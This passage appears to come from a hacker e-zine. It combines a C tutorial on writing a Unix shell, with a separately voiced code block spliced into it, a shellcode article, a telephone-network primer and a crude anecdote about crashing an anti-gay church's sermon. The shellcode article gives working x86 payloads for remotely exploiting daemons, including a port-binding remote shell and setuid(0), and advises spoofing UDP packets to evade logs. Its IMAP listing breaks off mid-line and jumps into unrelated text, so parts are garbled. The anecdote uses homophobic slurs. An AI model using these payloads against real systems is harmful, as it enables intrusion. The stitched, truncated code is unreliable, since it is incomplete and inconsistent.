   is not going to have the complexity of your standard unix shell that you
   use on a daily basis.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

#define STDMODE 0600
#define DELIMITERSET " ><|&"        // we are only going to add redirection to
                                    // our shell, not background or pipe support
#ifndef MAX_CANON
#define MAX_CANON 256
#endif
#define TRUE 1
#define FALSE 0
#define BLANK_STRING " "
#define PROMPT_STRING "b4b0$"
#define QUIT_STRING "quit"
#define BACK_STRING "&"             // for background process
#define PIPE_STRING "|"             // pipe support
#define NEWLINE_STRING "\n"
#define IN_REDIRECT_SYMBOL '<'      // redirection
#define OUT_REDIRECT_SYMBOL '>'     // symbols
#define NULL_SYMBOL '\0'
#define PIPE_SYMBOL '|'
#define BACK_SYMBOL '&'
#define NEWLINE_SYMBOL '\n'

int makeargv(char *s, char *delimiters, char ***argvp);
int parsefile(char *inbuf, char delimiter, char **v);   // this will return the
                                    // token following delimiter if it is present in *inbuf.
int redirect(char *infilename, char *outfilename);      // performs redirection
int connectpipeline(char *cmd, int frontfd[], int backfd[]);
/*************************-=EOF=-******************************/

First we will write an extremely basic command interpreter, just for you to get a basic idea as to how a shell calls a child process to execute commands, and for you to experiment with.

---------------------------bsh v1.0-----------------------------------
#include "b4b0shell.h"
#define MAX_BUF 500

int main(void)
{
    char input[MAX_BUF];
    char **rargv;

    while (1) {
        fprintf(stderr, "%s", PROMPT_STRING);
        if (fgets(input, MAX_BUF, stdin) == NULL)
            break;
        input[strcspn(input, NEWLINE_STRING)] = NULL_SYMBOL;  /* drop the newline fgets() keeps */
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if (fork() == 0) {
                if (makeargv(input, BLANK_STRING, &rargv) > 0)
                    execvp(rargv[0], rargv);    /* note: a failed execvp() is not handled here */
            }
            wait(NULL);
        }
    }
    exit(0);
}
--------------------------------EOF-----------------------------------------

Pretty simple huh? When you run it, go ahead and execute some basic programs, like ls, grep, find etc. It works! Now, as I said before, this is a very raw, basic shell, and does not support wildcards like '*' or '?'.
Also, it doesn't support certain commands like 'cd' which is available in any good shell. What if by some chance wait() isn't called? Well, not too much of a problem, but if a user enters a command before the previous one has finished, the commands will execute concurrently (read my article on concurrency). Also, due to the fact that this first version does not check for errors on the execvp() call, it gets fucked up if you enter an invalid command: your shell won't get control back from the child process, because the child process keeps running its OWN copy of the shell loop. So you have to type 'quit' to get back to your parent shell.

Let's write a better version of this shell that handles errors with execvp(), and we will also replace the #define'd MAX_BUF with MAX_CANON (located in b4b0shell.h), because MAX_BUF is nonportable.

----------------------------bsh v2.0-------------------------------------
#include "b4b0shell.h"

void execthecommand(char *incmd)
{
    char **rargv;

    if (makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if (execvp(rargv[0], rargv) == -1) {
            printf("Invalid command\n");
            exit(1);
        }
    }
    exit(1);
}

int main(void)
{
    char input[MAX_CANON];
    pid_t child_pid;

    while (1) {
        fputs(PROMPT_STRING, stdout);
        fflush(stdout);                 /* the prompt has no newline, so push it out */
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        if (input[strlen(input) - 1] == NEWLINE_SYMBOL)
            input[strlen(input) - 1] = NULL_SYMBOL;
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            } else if (child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF-----------------------------------------

We made several changes in version 2 of our shell. Notice we used fputs() instead of fprintf() for the prompt; fputs() prints a fixed string a lot faster. Also notice we did some more error checking in this version. And notice we now have the function execthecommand() to replace the original execvp() and makeargv() calls.
Control will never come back from the function execthecommand(), so you shouldn't have a problem when you enter invalid commands.

Unix deals with input/output through file descriptors. A program has to open a file or a device before it can access it. It then accesses the file through a handle (the descriptor) returned by the open() syscall. With support for redirection, you can do stuff like this:

b4b0$ cat < input.txt > output.txt

That command redirects its standard input to 'input.txt' and its standard output to 'output.txt'. The following is a revised version of the execthecommand() function that you can use to support redirection. I basically made execthecommand() parse *incmd, which might contain redirection. It then calls redirect() to perform the actual redirection, and makeargv() to create the command array. It then execs the command.

-----------------------------execthecommand() v2.0 by ph1x--------------------
#include "b4b0shell.h"

void execthecommand(char *incmd)
{
    char **rargv;
    char *infile = NULL;        /* stays NULL when no '<' is given */
    char *outfile = NULL;       /* stays NULL when no '>' is given */

    if (parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if (redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    else if (makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if (execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}
--------------------------EOF---------------------------------------------

Change the execthecommand() in bsh v2.0 to the one I modified for redirection support. Let's take a look at our final shell.
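One thing the listings cannot do on their own is link: makeargv(), parsefile() and redirect() are only declared in b4b0shell.h, never shown. The block below is an added example (my code, not ph1x's) that supplies self-contained bodies for those three helpers, my own guess at what the ush.h originals do, plus a run_command() that wraps the whole fork/redirect/exec/wait sequence of the shell and hands back the child's exit status, so a bad command, a missing file or a stray ">" can be observed instead of wedging the parent. MAX_ARGS is my own limit, not something from the header.

```c
/* Added example, not ph1x's code: my own bodies for the three helpers that
 * b4b0shell.h only declares (the ush.h originals may differ), plus
 * run_command(), bsh v3.0's fork/redirect/makeargv/execvp/wait in one call. */
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define IN_REDIRECT_SYMBOL  '<'
#define OUT_REDIRECT_SYMBOL '>'
#define BLANK_STRING        " "
#define MAX_ARGS            64          /* my own limit, not from the header */

/* Split s in place on any character in delimiters and build a NULL-terminated
 * argv in *argvp (heap allocated). Returns the token count, or -1 on failure. */
int makeargv(char *s, char *delimiters, char ***argvp)
{
    char **argv = calloc(MAX_ARGS + 1, sizeof *argv);   /* last slot stays NULL */
    int n = 0;
    if (argv == NULL)
        return -1;
    for (char *tok = strtok(s, delimiters); tok != NULL; tok = strtok(NULL, delimiters)) {
        if (n == MAX_ARGS) {            /* too many words: refuse rather than overrun */
            free(argv);
            return -1;
        }
        argv[n++] = tok;
    }
    *argvp = argv;
    return n;
}

/* Look for delimiter ('<' or '>') in inbuf. If present, copy the filename after
 * it into *v, splice the "< file" part out of inbuf so the rest still parses,
 * and return 1. Return 0 (*v = NULL) if absent, -1 if no filename follows. */
int parsefile(char *inbuf, char delimiter, char **v)
{
    char *sym = strchr(inbuf, delimiter);
    *v = NULL;
    if (sym == NULL)
        return 0;
    char *name = sym + 1 + strspn(sym + 1, " \t");
    size_t len = strcspn(name, " \t<>|&");
    if (len == 0 || (*v = malloc(len + 1)) == NULL)
        return -1;                      /* "cat >" : symbol but no file */
    memcpy(*v, name, len);
    (*v)[len] = '\0';
    memmove(sym, name + len, strlen(name + len) + 1);
    return 1;
}

/* Point stdin at infilename and/or stdout at outfilename (NULL = leave alone).
 * Called in the child, so the parent shell's own descriptors stay untouched. */
int redirect(char *infilename, char *outfilename)
{
    int fd;
    if (infilename != NULL) {
        if ((fd = open(infilename, O_RDONLY)) == -1 || dup2(fd, STDIN_FILENO) == -1)
            return -1;
        close(fd);
    }
    if (outfilename != NULL) {
        fd = open(outfilename, O_WRONLY | O_CREAT | O_TRUNC, 0600);  /* 0600 == STDMODE */
        if (fd == -1 || dup2(fd, STDOUT_FILENO) == -1)
            return -1;
        close(fd);
    }
    return 0;
}

/* Run one command line the way bsh v3.0 does and return the child's exit
 * status (127 when it cannot be run), or -1 if fork()/waitpid() fail. Every
 * path in the child ends in _exit(): in bsh v1.0 a failed execvp() instead
 * left the child running the parent's read loop as a second shell. */
int run_command(const char *line)
{
    char buf[256];
    char *infile, *outfile, **argv;
    int status;
    pid_t pid;
    if (strlen(line) >= sizeof buf)
        return -1;
    strcpy(buf, line);
    if ((pid = fork()) == -1)
        return -1;
    if (pid == 0) {
        if (parsefile(buf, IN_REDIRECT_SYMBOL, &infile) == -1 ||
            parsefile(buf, OUT_REDIRECT_SYMBOL, &outfile) == -1 ||
            redirect(infile, outfile) == -1 ||
            makeargv(buf, BLANK_STRING, &argv) <= 0)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127);                     /* execvp() only returns on failure */
    }
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Dropping these into b4b0shell.h's declarations and calling run_command() from the read loop gives the same behaviour as bsh v3.0, except that the parent learns the child's status instead of discarding it with wait(NULL).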
--------------------------bsh v3.0--------------------------------------
#include "b4b0shell.h"

void execthecommand(char *incmd)
{
    char **rargv;
    char *infile = NULL;        /* stays NULL when no '<' is given */
    char *outfile = NULL;       /* stays NULL when no '>' is given */

    if (parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if (redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    else if (makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if (execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}

int main(void)
{
    char input[MAX_CANON];
    pid_t child_pid;

    while (1) {
        fputs(PROMPT_STRING, stdout);
        fflush(stdout);                 /* the prompt has no newline, so push it out */
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        if (input[strlen(input) - 1] == NEWLINE_SYMBOL)
            input[strlen(input) - 1] = NULL_SYMBOL;
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            } else if (child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF--------------------------------------

Redirection is the last feature we are going to put in our shell. Unfortunately, I was busy as hell getting b4b0 7 together, and I didn't have much time to add support for pipes, background processes, job control (allows a user to move the foreground process group into the background, and vice versa), or most of the other things that a good shell features. This was merely for your learning and enjoyment. Hope you gained something out of it. Feel free to look up the functions in b4b0shell.h that we didn't use, and extend your shell. Bye. HEH!@#$

ph1x@b4b0.org

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
The Art of Making Shell Code, by smiler
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

Hopefully you are familiar with generic shell-spawning shellcode. If not, read Aleph's text "Smashing The Stack For Fun And Profit" before reading further.
This article will concentrate on the types of shellcode needed to exploit daemons remotely. Generally it is much harder to exploit remote daemons, because you do not have many ways of finding out the configuration of the remote server. Often the shellcode has to be much more complicated, which is what this article will focus on.

I will start by looking at the ancient IMAP4 exploit. This is a fairly simple exploit. All you need to do is "hide" the "/bin/sh" string in the shellcode (imapd converts all lowercase characters into uppercase). None of the instructions in the generic shell-spawning shellcode contain lower-case characters, so all you need to do is change the /bin/sh string. It is the same as normal shellcode, except there is a loop which adds 0x20 to each byte in the "/bin/sh" string. I put in lots of comments so even beginners can understand it. Sorry to all those asm virtuosos :]

-----imap.S-------
.globl main
main:
        jmp call
start:
        popl %ebx               /* get address of /bin/sh */
        movl %ebx,%ecx          /* copy the address to ecx */
        addb $0x6,%cl           /* ecx now points to the last character */
loop:
        cmpl %ebx,%ecx
        jl skip                 /* if (ecx

Most syscalls in linux x86 are done in the same way. The syscall number is put into register %eax, and the arguments are put into %ebx, %ecx and %edx respectively. In some cases, where there are more arguments than registers, it may be necessary to store the arguments in user memory and put the address of the arguments in the register. Or, if an argument is a string, you would have to store the string in user memory and pass the address of the string as the argument. As before, the syscall is invoked by "int $0x80". You can potentially use any syscall, but the ones mentioned above should just about be the only ones you will ever need. As an example, here's a little shellcode snippet from my wu-ftpd exploit that should execute setuid(0). Note: you should always zero a register before using it.
---setuid.S----
.globl main
main:
        xorl %ebx,%ebx          /* zero the %ebx register, i.e. the 1st argument */
        movl %ebx,%eax          /* zero out the %eax register */
        movb $0x17,%al          /* set the syscall number */
        int $0x80               /* call the interrupt handler */
---------------

Port-Binding Shellcode

When you are exploiting a daemon remotely with generic shellcode, it is necessary to have an active TCP connection to pipe the shell's stdin/out/err over. This is applicable to all the remote linux exploits I've seen so far, and is the preferred method. But it is possible that a new vulnerability may be found in a daemon that only offers a UDP service (SNMP for example). Or it may only be possible to access the daemon via UDP because the TCP ports are firewalled etc. Current linux remote vulnerabilities are exploitable via UDP - BIND as well as all rpc services run both UDP and TCP services. Also, if you send the exploit via UDP it is trivial to spoof the attacking udp packet so that you do not appear in any logs =)

To exploit daemons via UDP you could write shellcode to modify the password file or to perform some other cunning task, but an interactive shell is much more elite =] Clearly it is not possible to fit a UDP pipe into shellcode; you still need a TCP connection. So my idea was to write shellcode that behaved like a very rudimentary backdoor: it binds to a port and executes a shell when it receives a connection. I know for a fact that I wasn't the first one to write this type of shellcode, but no one has officially published it so... here goes.
A basic bindshell program (without the style) looks like this:

int main()
{
    char *name[2];
    int fd,fd2,fromlen;
    struct sockaddr_in serv;

    fd=socket(AF_INET,SOCK_STREAM,0);
    serv.sin_addr.s_addr=0;
    serv.sin_port=1234;
    serv.sin_family=AF_INET;
    bind(fd,(struct sockaddr *)&serv,16);
    listen(fd,1);
    fromlen=16; /*(sizeof(struct sockaddr)*/
    fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
    /* "connect" fd2 to stdin,stdout,stderr */
    dup2(fd2,0);
    dup2(fd2,1);
    dup2(fd2,2);
    name[0]="/bin/sh";
    name[1]=NULL;
    execve(name[0],name,NULL);
}

Obviously, this is going to require a lot more space than normal shellcode, but it can be done in under 200 bytes and most buffers are quite a bit larger than that. There is a slight complication in writing this shellcode, as socket syscalls are done slightly differently than other syscalls under linux. Every socket call has the same syscall number, 0x66. To differentiate between different socket calls, a subcode is put into the register %ebx. These can be found in the linux include files. The important ones being:

SYS_SOCKET 1
SYS_BIND   2
SYS_LISTEN 4
SYS_ACCEPT 5

We also need to know the values of the constants, and the exact structure of sockaddr_in. Again these are in the linux include files.

AF_INET == 2
SOCK_STREAM == 1

struct sockaddr_in {
    short int sin_family;       /* 2 byte word, containing AF_INET */
    unsigned short int sin_port;/* 2 byte word, containing the port in network byte order */
    struct in_addr sin_addr;    /* 4 byte long, should be zeroed */
    unsigned char pad[8];       /* should be zero, but doesn't really matter */
};

Since there are only two registers left, the arguments must be placed sequentially in user memory, and %ecx must contain the address of the first. Hence we have to store the arguments at the end of the shellcode. The first 12 bytes will contain the 3 long arguments, the next 16 will contain the sockaddr_in structure and the final 4 will contain fromlen for the accept() call. Finally, the result from each syscall is held in %eax.
So, without further ado, here is the portshell warez... Again I've over-commented everything.

----portshell.S----
.globl main
main:
/* I had to put in a "bounce" in the middle of the code as the shellcode
 * was too big. If I had made it jmp the entire shellcode, the instruction
 * would have contained a null byte, so if anyone has a shorter version,
 * please send me it. */
        jmp bounce
start:
        popl %esi
/* socket(2,1,0) */
        xorl %eax,%eax
        movl %eax,0x8(%esi)     /* 3rd arg == 0 */
        movl %eax,0xc(%esi)     /* zero out sock.sin_family&sock.sin_port */
        movl %eax,0x10(%esi)    /* zero out sock.sin_addr */
        incb %al
        movl %eax,%ebx          /* socket() subcode == 1 */
        movl %eax,0x4(%esi)     /* 2nd arg == 1 */
        incb %al
        movl %eax,(%esi)        /* 1st arg == 2 */
        movw %eax,0xc(%esi)     /* sock.sin_family == 2 */
        leal (%esi),%ecx        /* load the address of the arguments into %ecx */
        movb $0x66,%al          /* set socket syscall number */
        int $0x80
/* bind(fd,&sock,0x10) */
        incb %bl                /* bind() subcode == 2 */
        movb %al,(%esi)         /* 1st arg == fd (result from socket()) */
        movl %ecx,0x4(%esi)     /* copy address of arguments into 2nd arg */
        addb $0xc,0x4(%esi)     /* increase it by 12 bytes to point to sockaddr struct */
        movb $0x10,0x8(%esi)    /* 3rd arg == 0x10 */
        movb $0x23,0xe(%esi)    /* set sin.port */
        movb $0x66,%al          /* no need to set %ecx, it is already set */
        int $0x80
/* listen(fd,2) */
        movl %ebx,0x4(%esi)     /* bind() subcode==2, move this to the 2nd arg */
        incb %bl                /* no need to set 1st arg, it is the same as bind() */
        incb %bl                /* listen() subcode == 4 */
        movb $0x66,%al          /* again, %ecx is already set */
        int $0x80
/* fd2=accept(fd,&sock,&fromlen) */
        incb %bl                /* accept() subcode == 5 */
        movl %ecx,0x4(%esi)     /* copy address of arguments into 2nd arg */
        addb $0xc,0x4(%esi)     /* increase it by 12 bytes */
        movl %ecx,0x4(%esi)     /* copy address of arguments into 3rd arg */
        addb $0x1c,0x4(%esi)    /* increase it by 12+16 bytes */
        movb $0x66,%al
        int $0x80
/* KLUDGE */
        jmp skippy
bounce:
        jmp call
skippy:
/* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
        movb %al,%bl            /* move fd2 to 1st arg */
        xorl %ecx,%ecx          /* 2nd arg is 0 */
        movb $0x3f,%al          /* set dup2() syscall number */
        int $0x80
        incb %cl                /* 2nd arg is 1 */
        movb $0x3f,%al
        int $0x80
        incb %cl                /* 2nd arg is 2 */
        movb $0x3f,%al
        int $0x80
/* execve("/bin/sh",["/bin/sh"],NULL) */
        movl %esi,%ebx
        addb $0x20,%ebx         /* %ebx now points to "/bin/sh" */
        xorl %eax,%eax
        movl %ebx,0x8(%ebx)
        movb %al,0x7(%ebx)
        movl %eax,0xc(%ebx)
        movb $0xb,%al
        leal 0x8(%ebx),%ecx
        leal 0xc(%ebx),%edx
        int $0x80
/* exit(0) */
        xorl %eax,%eax
        movl %eax,%ebx
        incb %al
        int $0x80
call:
        call start
        .ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
-----------------------------------------------------

Once you have sent the exploit, you only need to connect to port 8960, and you have an interactive shell.

----------------[ FreeBSD shellcode

Just in case all of that was old hat to you, I'll take a little foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most ways completely different, primarily because syscalls are done by pushing arguments onto the stack and using a far call. The syscall number still goes in the %eax register however. OpenBSD is much the same, but it uses an interrupt for syscalls. The main complication in writing shellcode for FreeBSD is in the far call (instruction lcall 7,0), which contains 5 null bytes. Obviously you would need to write some basic self-modifying shellcode. Since this is going to be used in every syscall you make, it's best to put this into a mini-function and call it whenever necessary. I wrote a little template for this; it's easy enough to make it execute a shell or bind to a port. Just in case you're wondering, the syscall number for execve is 0x3b.
----fbsd.S----
.globl main
main:
        jmp call
start:
/* Modify the ascii string so it becomes lcall 7,0 */
        popl %esi
        xorl %ebx,%ebx
        movl %ebx,0x1(%esi)     /* zeroed long word */
        movb %bl,0x6(%esi)      /* zeroed byte */
        movl %esi,%ebx
        addb $0x8,%bl           /* ebx points to binsh */
        jmp blah                /* start the code */
call:
        call start
syscall:
        .ascii "\x9a\x01\x01\x01\x01\x07\x01"   /* hidden lcall 7,0 */
        ret
binsh:
        .ascii "/bin/sh...."
blah:
/* put shellcode here */
        call syscall

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
The Telephone System/Network Part 1, by pabell
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

THE TELEPHONE SYSTEM OR NETWORK

This paper was written mainly because of the lack of real information kicking around on and off the net about phone systems and networks. This is part one of a two-part primer on phone systems. This is a very introductory paper. I don't go into great detail, but cover the basics and a first look at phone networks and systems. If you really haven't been exposed to the telephony industry, this paper may be ominous.

For the purpose of this paper I have broken the telephone network into three basic components.

1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES

In this paper we will look at each of the three sections. Section three, the INSIDE PLANT FACILITIES, will be covered in detail throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT FACILITIES sections of the telephone network will be explained briefly in general terms.

Most of the parts of the telephone system or network will already be familiar to you, even without realizing it. You have a phone of some description in your home or office, which is part of the INSIDE PLANT FACILITIES section of the telephone network. The INSIDE PLANT FACILITIES consists of all the cable, hardware, telephone sets or equipment in the building or between buildings on the same piece of property.
The part of the network which connects buildings of various shapes and descriptions together is called THE OUTSIDE PLANT FACILITIES. Poles and associated wires are the only type of outside plant distribution system in use today. The remaining part you may not know about, or at least think you don't know about, is the Central Switching Machine.

The basic telephone circuit is a Two Wire Circuit, which connects every telephone set, through the Outside Plant Facilities, to a Central Switch. This two-wire circuit is usually referred to as a "pair". One wire of the pair is referred to as the TIP and the other wire is the RING.

THE CENTRAL SWITCHING MACHINE

The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all the individual two wire circuits, or spokes, are connected. This may sound pretty complicated, but it really isn't. The central switch monitors your telephone circuit and gives you a dial tone when you lift the telephone set off the cradle. Taking a telephone handset off the cradle is referred to as going "off-hook". Off-hook is a very common phrase, and you will hear it in later parts of this paper.

When you dial, the Central Switch registers the digits dialed, and identifies the circuit of the party you are trying to reach. The Central Switch then connects your two-wire circuit to the party you dialed. The two telephone sets which are connected together by the Central Switch are referred to as the "calling" and "called" parties. The Central Switch then sends a ringing voltage out to the called party, which rings the set's bells to identify an incoming call. When the called party goes off-hook, the Central Switch recognizes the off-hook condition and stops sending the ringing voltage; the two parties then converse. When the calling party dials the number of a telephone circuit which is already in use, or "busy", the Central Switch recognizes the busy condition and returns a busy tone to the calling party.
So, as you can see, the Central Switch isn't really unfamiliar to you. You have interacted with, and experienced, many of the operations it performs. There are many types of Central Switching Machines in use throughout the telephone industry today. Each switch has its advantages and features; however, all systems provide the basic functions which were briefly described.

To review, the main parts of the Telephone Network I have described so far are:

1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES

Let's backtrack briefly to the Outside Plant Facilities section of the network. Obviously, it would be too difficult to take each separate two-wire circuit individually back to the Central Switch. Consequently, numerous two wire circuits or pairs from a common area are bound together in a common covering, or sheath. These groups of pairs enclosed by a common sheath are referred to as cable. The actual number of pairs in a cable, or the size of the cable, can vary from one pair to hundreds of pairs depending upon how many circuits the cable must service.

As was mentioned previously, all the cables servicing locations leave the Central Switch in different directions according to the route which will be the most cost effective and can effectively service people in the area. The cables which leave the Central Switch are very large, but as the cable goes along it is continually decreasing in size, as smaller cables are dropped off at locations where they are needed. The smaller cables branch out from the main cables, and these cables again branch out to smaller cables until every building and place is reached.

There are three basic types of outside plant facilities in use today which connect the Central Switch, ultimately, to your phone.

1. AERIAL CABLE
2. UNDERGROUND CABLE
3. FIBER OPTIC CABLE

Let's briefly look at each of the types of Outside Plant Facilities.
Aerial Cable

As the name aerial cable would indicate, the cable and terminals are supported above the ground on poles. The Aerial Cable distribution system is probably the one you are most familiar with, since it was the first system utilized across North America. The poles and wire are still visible throughout this country today, and in many cases this is still the most cost-effective method where underground cabling is physically impossible. The diagram would be typical of a single line residential building application of an Aerial Outside Plant System.

You may see the term "terminal" in the diagram. Terminals are simply access points placed at convenient locations, on or between poles, along the cable route to permit connections to selected pairs in the cable. For example, a cable consisting of 100 pairs might have a terminal mounted on the pole to allow a technician access to pairs 1-25. The next terminal would allow access to pairs 24-40, and so on, until all the pairs have been used. In this manner, the pair assigned to each building at the Central Switch can be accessed at the closest terminal to that particular building. The individual building's aerial "drop wire" is then connected to the pair in that terminal.

Underground Cable

The underground cable distribution system is very similar in design to the aerial cable system. I consider underground cable to be both DIRECT BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS. As the title Direct Buried would indicate, the cable is placed into the ground with no protection other than the inherent protection provided by the cable composition. Underground Conduit Systems for cable are used to provide an out of sight cable system and to provide a means of adding to the existing cable as service demands increase. Underground Conduit Systems also provide protection for the cables, since the cables are inside a pipe which shields the cable.
The Underground Cable Distribution System is configured similarly to the aerial cable, in that cables leave a central point and continually branch out to smaller cables until all the buildings etc. have been accommodated. The Underground System is connected to buildings in basically two ways: PEDESTALS and ENCAPSULATION.

Pedestals are simply terminals or access points where building cabling can be connected to the cable from the Central Switching Machine. There are many types, sizes, and shapes of pedestals in use today. The following diagram is a simplified depiction of the underground cable (drop wire) from a building premises, which has been buried, to a pedestal for connection.

Encapsulation is when the building's drop wire is permanently spliced into the underground distribution system. This system is preferred in situations where visible pedestals are not appropriate, or possible.

Fiber Optic Transmission Systems

In the aerial and underground cable distribution systems looked at earlier, a pair of copper wires is used to carry the electrical signals generated by the transmitting building's phone to the switching machine, and then ultimately to the receiver's phone. The mouthpiece (transmitter) of the telephone converts the acoustic voice message into corresponding electrical signals. The electrical signals are passed on to the receiver's earpiece (receiver), where they are converted back to the original acoustic voice message.

In certain cases now, it is becoming uneconomical to provide a pair of wires from every customer phone to the central switch. Transmitting speech and information via glass fibers instead of the conventional copper wire methods previously described is becoming increasingly popular in high traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and more prevalent in the communication industry. "FOTS" is short for Fiber Optics Transmission System.
The development of FOTS technology has been increasing dramatically in recent years. The transmitting building's phone still generates the same electrical signals, but the signals are used to turn a light source on and off. The light travels down the glass fibers where it is received and converted back to electrical impulses, which are connected to the receiving customer's two wire copper pair. To get a perspective on the comparison of a pair of copper wires to a pair of glass fibers, consider the number of independent connections which are possible on each type of system.

* A pair of copper wires will provide two way communications for one conversation.
* A pair of glass fibers can provide up to 8000 independent connections.

The demands for more and more facilities to transmit and receive information are growing increasingly rapidly. The cost and limitations of traditional means of linking areas together are becoming more apparent. The normal cable distribution systems in use throughout the telephone industry employ combinations of underground, aerial, and FOTS distribution systems to provide the most cost efficient and effective means of providing service.

There is your basic introduction to the telephone network or system. As my series on phone networks goes on I will go into greater detail and explain some of its more complex issues and attributes.

Pabell
pabell@comtech.ab.ca

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
How I literally got kicked out of the Eastern Baptist Church, by schemerz
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

Disclaimer: Incidents included are all fictitious in nature due to the shady recollection process after smoking a little bit too much hash. These incidents were funny, at least as I remember it. These accounts are somewhat factual, somewhat not, so I decided just to change the names and make it safe in case I get anything horribly wrong.
Eastern Baptist Church is located in Topuka, the capital of the state of Kansas. It's not a really big church, but they get in the news a lot. Most of the time they leave their tact at home and picket funerals and concerts, most recently the funeral of Mathew Sheppard. (I think they are too chicken to picket the Rob Zombie and Korn concert in KC last night, kick ass concert btw, but that's another article... :) They are also responsible for web sites such as www.goddetestsfags.com. So they are really a fun bunch. Rush Limbough would have been proud.

Reverend Fred Felps heads the crowd, who was a lawyer in a previous life, until one of his sons got out of the closet. Fred Felps then runs to the nearest Warmart to purchase a really bad white robe and calls himself a preacher. After being thrown out of the Southern Baptist Church because of his faggot hating ways, he started his own church, the Eastern Baptist Church, which basically runs out of his own house along with 20-30 family members and close friends. They get supported by a lot of white power parties too. Although not all of the family is predominantly prejudiced, I have had the pleasure of meeting his grandson, Ben Felps, who happens to be a graduate student doing computer science at the University of Kansas. Ben admins most of his granddaddy's sites, including of course yours truly.

Enough with the background. I have to explain why I had the urge of seeing one of these sermons of Fred's, if not fucking it up and causing some serious mayhem: Almost 3 years ago I arrived in Kansas fresh off the boat, as they would say, after having a less than stellar high school career somewhere in South East Asia. Shortly after arriving at the university and being shipped off to this smelly little dorm room, I was introduced to Sam, my new roommate. He drove me around, showing me stuff, and I got to know him very well.
We were just kicking it one weekend in September and started watching the tele, when channel 6 was doing a special on a concert held at a local community college. Turns out this composer was dying of AIDS, and someone was holding a concert in his name for being the talent that he is. (I can't remember this dood's name, but I remember listening to some of his stuff on the local university radio now. Truly a talent.) Caught out of the corner of the camera there were these doods holding up signs with slogans like "Anal Sex=Aids=Death," "Gay=Death of Ethics=Death of America," and of course, "God detests fags!". I was thoroughly bewildered at the sight of such signs, and proceeded to bug Sam about it. Shit like this at home just does not fly. It's not like Asians have a strong tolerance of homosexuals or racial diversity, but they keep it to themselves and have the politeness to withhold their opinion at times of mourning, such as a concert displaying one's work as one dies of AIDS.

Being the fuckwit 18 year old that I was, I suggested to Sam that we head over and see one of their sermons and check out their reasoning, because neither of us could make any logical sense out of Fred's websites. So we called the church up and asked if there was an open sermon coming up. We stated that we weren't gonna cause trouble, and putting on my fakest British accent, asked if we could attend. We were of course declined the opportunity, since it was a closed church. Being the dumb motherfucker Sam can be sometimes, we decided to crash the party instead. (He's getting married to the least sensible woman on this planet in a month, so WATCH OUT FOR DA KIDS.) So we hopped into his girlfriend's car (btw we chatted this woman up no more than one week before, and now three years later Sam is fucking marrying the woman... good god... time has passed QUICKLY... oh and she lent him the car... Megan is so fucking cool, prolly cause Sam is such a fucking pimp), and drove to Topuka.
We arrived at the church shortly before the sermon began, and walked in, saying we were looking for Ben. Ben came out shortly, trying to cover his blood soaked ass, saying that his granddad was holding a sermon. We talked a bit, commenting a little on the upside down American flag hanging outside the church. He said he would attend to us shortly after the sermon. I put on the largest puppy dog eyes I could muster, and asked *very* politely if I could attend the sermon. Since he was a TA in one of my computer science lab classes, he was sure I wasn't going to pull any shit. We got in, sat on a seat. The living room was packed, and Sam was kinda chickening out a little... "Maybe we shouldn't be here dood..." Little did I know he was one of the most articulate arguers I was ever gonna meet :)

